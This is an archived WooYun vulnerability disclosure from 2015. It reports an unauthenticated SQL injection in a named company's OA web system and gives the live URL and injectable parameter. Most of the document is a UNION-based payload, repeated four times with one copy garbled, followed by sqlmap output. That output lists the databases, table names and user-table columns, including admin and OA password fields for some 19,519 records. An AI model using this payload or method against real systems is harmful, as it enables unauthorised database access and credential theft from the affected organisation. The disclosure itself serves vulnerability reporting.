乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-30: 细节已通知厂商并且等待厂商处理中 2015-12-05: 厂商已经主动忽略漏洞,细节向公众公开
SQL注射
OA系统
http://ucoa.uc56.com:8088/Login.aspx
未授权访问注入点
http://ucoa.uc56.com:8088/OaWeb/PresonnelMain.aspx?typeid=26
Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NULL-----[15:37:56] [INFO] testing Microsoft SQL Server[15:37:56] [INFO] confirming Microsoft SQL Server[15:37:57] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008[15:37:57] [INFO] fetching database names[15:37:57] [INFO] the SQL query used returns 6 entries[15:37:57] [INFO] retrieved: master[15:37:57] [INFO] retrieved: model[15:37:58] [INFO] retrieved: msdb[15:37:58] [INFO] retrieved: tempdb[15:37:59] [INFO] retrieved: ucoa[15:37:59] [INFO] retrieved: ucwebavailable databases [6]:[*] master[*] model[*] msdb[*] tempdb[*] ucoa[*] ucweb
Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NULL-----[15:39:14] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008[15:39:14] [INFO] fetching tables for database: ucoa[15:39:14] [INFO] the SQL query used returns 70 entries[15:39:14] [INFO] retrieved: dbo.a_user[15:39:15] [INFO] retrieved: dbo.Android_User[15:39:15] [INFO] retrieved: dbo.android_Version[15:39:15] [INFO] retrieved: dbo.androidArea[15:39:15] [INFO] retrieved: dbo.AreaClassfiy[15:39:16] [INFO] retrieved: dbo.AreaClassfiy[15:39:16] [INFO] retrieved: dbo.BackupDatabase[15:39:16] [INFO] retrieved: dbo.BaiDuYuan[15:39:19] [INFO] retrieved: dbo.Client[15:39:19] [INFO] retrieved: dbo.ClientRecord[15:39:20] [INFO] retrieved: dbo.CompanyIMG[15:39:20] [INFO] retrieved: dbo.ContactCenter[15:39:21] [INFO] retrieved: dbo.ContactMessage[15:39:21] [INFO] retrieved: dbo.DemandFeedback[15:39:22] [INFO] retrieved: dbo.Error_User[15:39:23] [INFO] retrieved: dbo.Fax[15:39:23] [INFO] retrieved: dbo.GraphicInfo[15:39:23] [INFO] retrieved: dbo.GraphicItmeInfo[15:39:24] [INFO] retrieved: dbo.ImportantMessages[15:39:24] [INFO] retrieved: dbo.M_DISTRICT[15:39:24] [INFO] retrieved: dbo.Menus[15:39:25] [INFO] retrieved: dbo.N_Collection[15:39:25] [INFO] retrieved: dbo.News[15:39:25] [INFO] retrieved: dbo.newWxProgram[15:39:26] [INFO] retrieved: dbo.Notice_Collection[15:39:26] [INFO] retrieved: dbo.Options[15:39:26] [INFO] retrieved: dbo.Personnel[15:39:26] [INFO] retrieved: dbo.Port_EmpDept[15:39:26] [INFO] retrieved: dbo.Port_EmpStation[15:39:26] [INFO] retrieved: dbo.Program_backup[15:39:27] [INFO] retrieved: dbo.Program_backup[15:39:27] [INFO] retrieved: dbo.Range[15:39:28] [INFO] retrieved: dbo.ReadRecord[15:39:28] [INFO] retrieved: dbo.S_SearchClassfiy[15:39:28] [INFO] retrieved: dbo.ScoreUser_backup[15:39:29] [INFO] retrieved: dbo.ScoreUser_backup[15:39:29] [INFO] retrieved: dbo.SiteNocies[15:39:29] [INFO] retrieved: dbo.SiteNocies[15:39:29] [INFO] retrieved: dbo.sqlmapoutput[15:39:30] [INFO] retrieved: dbo.Sys_Role[15:39:30] [INFO] retrieved: dbo.test2[15:39:30] [INFO] retrieved: dbo.test2[15:39:30] [INFO] retrieved: dbo.TodyVisit[15:39:31] [INFO] retrieved: dbo.Uc_Port_Dept[15:39:31] [INFO] retrieved: dbo.Uc_Port_Emp[15:39:31] [INFO] retrieved: dbo.Uc_Port_Station[15:39:31] [INFO] retrieved: dbo.UC_Video[15:39:31] [INFO] retrieved: dbo.UcAuthority[15:39:32] [INFO] retrieved: dbo.UcClaim[15:39:32] [INFO] retrieved: dbo.UcClassify[15:39:33] [INFO] retrieved: dbo.UcDemand[15:39:33] [INFO] retrieved: dbo.UcDownload[15:39:33] [INFO] retrieved: dbo.UcMateriaClassify[15:39:33] [INFO] retrieved: dbo.UcMaterial[15:39:34] [INFO] retrieved: dbo.UcMCfy[15:39:34] [INFO] retrieved: dbo.UcMessages[15:39:34] [INFO] retrieved: dbo.UcNotice[15:39:35] [INFO] retrieved: dbo.UcSofoMsg[15:39:35] [INFO] retrieved: dbo.UcSofoMsg[15:39:35] [INFO] retrieved: dbo.UcUnknowngoods[15:39:36] [INFO] retrieved: dbo.UcUserInfo[15:39:36] [INFO] retrieved: dbo.V_UnKnownGoods[15:39:36] [INFO] retrieved: dbo.Votes[15:39:37] [INFO] retrieved: dbo.VotesUsers[15:39:37] [INFO] retrieved: dbo.WeiXin_User[15:39:37] [INFO] retrieved: dbo.WeiXin2015[15:39:38] [INFO] retrieved: dbo.weixinuser2015[15:39:38] [INFO] retrieved: dbo.WxProgram[15:39:38] [INFO] retrieved: dbo.WxUser_backup[15:39:39] [INFO] retrieved: dbo.WxUser_backupDatabase: ucoa[70 tables]+-------------------+| Android_User || AreaClassfiy || AreaClassfiy || BackupDatabase || BaiDuYuan || Client || ClientRecord || CompanyIMG || ContactCenter || ContactMessage || DemandFeedback || Error_User || Fax || GraphicInfo || GraphicItmeInfo || ImportantMessages || M_DISTRICT || Menus || N_Collection || News || Notice_Collection || Options || Personnel || Port_EmpDept || Port_EmpStation || Program_backup || Program_backup || Range || ReadRecord || S_SearchClassfiy || ScoreUser_backup || ScoreUser_backup || SiteNocies || SiteNocies || Sys_Role || TodyVisit || UC_Video || UcAuthority || UcClaim || UcClassify || UcDemand || UcDownload || UcMCfy || UcMateriaClassify || UcMaterial || UcMessages || UcNotice || UcSofoMsg || UcSofoMsg || UcUnknowngoods || UcUserInfo || Uc_Port_Dept || Uc_Port_Emp || Uc_Port_Station || V_UnKnownGoods || Votes || VotesUsers || WeiXin2015 || WeiXin_User || WxProgram || WxUser_backup || WxUser_backup || a_user || androidArea || android_Version || newWxProgram || sqlmapoutput || test2 || test2 || weixinuser2015 |+-------------------+
Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NULL-----[15:40:44] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008[15:40:44] [INFO] fetching tables for database: ucweb[15:40:44] [INFO] the SQL query used returns 26 entries[15:40:44] [INFO] retrieved: dbo.AdImg[15:40:45] [INFO] retrieved: dbo.Area_info[15:40:46] [INFO] retrieved: dbo.Area_info[15:40:46] [INFO] retrieved: dbo.Company[15:40:46] [INFO] retrieved: dbo.Contact[15:40:46] [INFO] retrieved: dbo.DataBase_Backup[15:40:46] [INFO] retrieved: dbo.Guestbook[15:40:47] [INFO] retrieved: dbo.JoinContact[15:40:47] [INFO] retrieved: dbo.Links[15:40:47] [INFO] retrieved: dbo.Menu[15:40:48] [INFO] retrieved: dbo.News_Img[15:40:48] [INFO] retrieved: dbo.News_Img[15:40:49] [INFO] retrieved: dbo.NewsType[15:40:49] [INFO] retrieved: dbo.Product[15:40:49] [INFO] retrieved: dbo.Range[15:40:49] [INFO] retrieved: dbo.Recruitment[15:40:50] [INFO] retrieved: dbo.ReplyGuestBook[15:40:50] [INFO] retrieved: dbo.RGuestbook[15:40:50] [INFO] retrieved: dbo.ServiceHotline[15:40:50] [INFO] retrieved: dbo.sqlmapoutput[15:40:50] [INFO] retrieved: dbo.tNews[15:40:50] [INFO] retrieved: dbo.UC_Activity[15:40:51] [INFO] retrieved: dbo.UC_People[15:40:51] [INFO] retrieved: dbo.UcHonor[15:40:51] [INFO] retrieved: dbo.UserInfo[15:40:51] [INFO] retrieved: dbo.WebSiteDatabase: ucweb[26 tables]+-----------------+| AdImg || Area_info || Area_info || Company || Contact || DataBase_Backup || Guestbook || JoinContact || Links || Menu || NewsType || News_Img || News_Img || Product || RGuestbook || Range || Recruitment || ReplyGuestBook || ServiceHotline || UC_Activity || UC_People || UcHonor || UserInfo || WebSite || sqlmapoutput || tNews |+-----------------+
Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112HAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CH103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULLLL-----[16:09:42] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008[16:09:42] [INFO] fetching columns for table 'UcUserInfo' in database 'ucoa'[16:09:42] [INFO] the SQL query used returns 21 entries[16:09:42] [INFO] retrieved: "filesize","nchar"[16:09:42] [INFO] retrieved: "noticeClassify","varchar"[16:09:43] [INFO] retrieved: "orgCode","varchar"[16:09:44] [INFO] retrieved: "orgType","varchar"[16:09:44] [INFO] retrieved: "UcArea","varchar"[16:09:44] [INFO] retrieved: "UcAuthority","varchar"[16:09:44] [INFO] retrieved: "UcAuthorityName","varchar"[16:09:45] [INFO] retrieved: "UcCenter","varchar"[16:09:45] [INFO] retrieved: "UcCretae","datetime"[16:09:46] [INFO] retrieved: "UcEMP","varchar"[16:09:46] [INFO] retrieved: "UcENABLED","char"[16:09:47] [INFO] retrieved: "UcID","int"[16:09:47] [INFO] retrieved: "UcIsimportant","int"[16:09:47] [INFO] retrieved: "UcIsTop","int"[16:09:48] [INFO] retrieved: "UCNociteAreaID","nchar"[16:09:48] [INFO] retrieved: "UcOaAdminEnabled","int"[16:09:48] [INFO] retrieved: "UcSITE","varchar"[16:09:48] [INFO] retrieved: "UcUserId","varchar"[16:09:49] [INFO] retrieved: "UcUserName","varchar"[16:09:49] [INFO] retrieved: "UcUserPwdAdmin","varchar"[16:09:49] [INFO] retrieved: "UcUserPwdOa","varchar"[16:09:50] [INFO] fetching entries for table 'UcUserInfo' in database 'ucoa'[16:09:50] [INFO] the SQL query used returns 19519 entries
用户表具体的数据就不跑了
过滤sql特殊字符
危害等级:无影响厂商忽略
忽略时间:2015-12-05 17:58
漏洞Rank:15 (WooYun评价)
暂无